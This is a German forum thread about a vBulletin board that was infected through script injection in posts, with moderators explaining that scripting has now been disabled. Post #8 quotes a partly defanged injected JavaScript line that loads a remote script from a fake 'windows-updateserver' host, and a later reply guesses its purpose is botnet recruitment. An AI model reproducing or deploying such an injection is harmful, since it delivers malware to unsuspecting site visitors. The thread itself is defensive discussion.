Ergebnis 1 bis 15 von 42

Thema: Forum infiziert!

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Registriert seit
    01.08.2007
    Beiträge
    557
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

  2. #2
    Registriert seit
    23.04.2003
    Beiträge
    807
    Zitat Zitat von Firefighter Heiti Beitrag anzeigen
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
    Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
    Code:
    {script}
    Hier Schadcode nach wahl
    {/script}
    benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier

    EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

  3. #3
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

  4. #4
    Registriert seit
    06.08.2005
    Beiträge
    3.336
    Zitat Zitat von bastelheini Beitrag anzeigen
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
    Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.

    Ist aber nun alles deaktiviert.
    Schöne Grüße,
    abc-truppe
    Mod-Team
    (Kleinanzeigen, Off-Topic)

  5. #5
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso:)

    kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?

  6. #6
    Registriert seit
    06.08.2005
    Beiträge
    3.336
    Daran wird derzeit gerade gearbeitet :)
    Backdraft ist schon dran!
    Schöne Grüße,
    abc-truppe
    Mod-Team
    (Kleinanzeigen, Off-Topic)

  7. #7
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso:)


    gut dann hör ich auf mit nerven:D

  8. #8
    Registriert seit
    01.08.2002
    Beiträge
    594
    Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:


    XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")


    (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)

    Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.

  9. #9
    Registriert seit
    01.08.2007
    Beiträge
    557
    Zitat Zitat von Pipsi Beitrag anzeigen
    Würde mich interessieren, was er damit bezwecken will....
    Ein BOT-Netz aufbauen :)

    hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.

    Zitat Zitat von getreu dem Motto
    "Von Adobe, das kann ja nicht falsch sein."

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •